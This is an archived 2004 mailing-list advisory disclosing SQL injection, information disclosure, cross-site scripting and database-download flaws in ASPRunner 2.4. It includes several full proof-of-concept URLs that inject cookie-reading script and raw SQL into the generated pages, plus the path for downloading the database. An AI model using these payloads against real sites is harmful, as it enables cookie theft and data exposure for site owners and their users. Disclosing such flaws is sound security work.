[VulnWatch] ASPRunner Multiple Vulnerabilities

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 07/26/04

  • Next message: Paul Schmehl: "[VulnWatch] Re: [VulnDiscuss] Re: [Full-Disclosure] Automated SSH login attempts?"
    To: <bugtraq@securityfocus.com>
    Date: Mon, 26 Jul 2004 11:58:18 +0300
    
    

    ------------------------------------------------------
    ASPRunner Multiple Vulnerabilities
    ------------------------------------------------------

    Online URL : http://ferruh.mavituna.com/article/?574

    1) SQL Injection;
    Severity : Moderatly Critical

    2) Information Disclosure;
    Severity : Low Critical

    3) XSS (Cross Site Scripting);
    Severity : Low Critical

    4) Database Download;
    Severity : Moderatly Critical

    ------------------------------------------------------
    ABOUT ASPRunner;
    ------------------------------------------------------
    Developer Description;
    ASPRunner creates a set of ASP pages to access and modify Oracle, SQL
    Server, MS Access , DB2, MySQL, or FileMaker databases, or any other ODBC
    datasource. Using generated ASP pages, users can search, sort, edit, delete
    and add data into a database. ASPRunner is easy to learn, you can get
    started in just 10 minutes!

    URL & Demo Download ;
    http://www.xlinesoft.com/asprunner/

    ------------------------------------------------------
    VULNERABLE;
    ------------------------------------------------------
    ASPRunner version 2.4 and below

    ------------------------------------------------------
    NOT VULNERABLE;
    ------------------------------------------------------
    -

    ------------------------------------------------------
    1) SQL Injection;
    ------------------------------------------------------
    Every Page is vulnerable to SQL Injection atacks. (Login pages are not
    vulnerable).
    There is no POC because of SQL Injection attacks depends on database type
    and structure.

    ------------------------------------------------------
    2) INFORMATION DISCLOSURE;
    ------------------------------------------------------
    An attacker can gain information from hidden fields and file names.

            - File names disclosure database generated table name.
            - Several hidden field shows complete SQL Queries
            - Also these hidden fields can be modified.
            - Errors are generating detailed page which gives lots of
    information to the client.

    ------------------------------------------------------
    3) XSS (Cross Site Scripting);
    ------------------------------------------------------
    There are no control for XSS attacks, some samples from several pages;
            
            - [TABLE]_search.asp (post)
            
    http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
    _id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
    SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
    earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
    archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
    e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=

            - [TABLE]_edit.asp (post)
            
    http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
    geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
    lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
    %5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
    edQuotes=&NeedQuotes=&action=view

            - [TABLE]_list.asp (post)
            
    http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
    ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
    +++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
    like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
    &SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
    9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
    uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
    e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

            - export.asp (post)
            
    http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
    3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
    %5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
    pagesize=20

    ------------------------------------------------------
    4) Database Download;
    ------------------------------------------------------
            Database can be downloaded over web. This is not a critical issue
    because there is no way to determine filename. But it's easy to guess it by
    gathering information about table and field names.

            MS Access or other database file (if it's not MSSQL, similar or ODBC
    Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]

    -----------------------------------------------------
    HISTORY;
    ------------------------------------------------------
    Discovered : 04.07.2004
    Vendor Informed : 05.07.2004 / 12.07.2004
    Published : 26.07.2004

    ------------------------------------------------------
    Vendor Status;
    ------------------------------------------------------
    2 emails, No Reply, No Fix

    Ferruh Mavituna
    http://ferruh.mavituna.com
    PGP Key: http://ferruh.mavituna.com/pgpkey.asc


  • Next message: Paul Schmehl: "[VulnWatch] Re: [VulnDiscuss] Re: [Full-Disclosure] Automated SSH login attempts?"

    Relevant Pages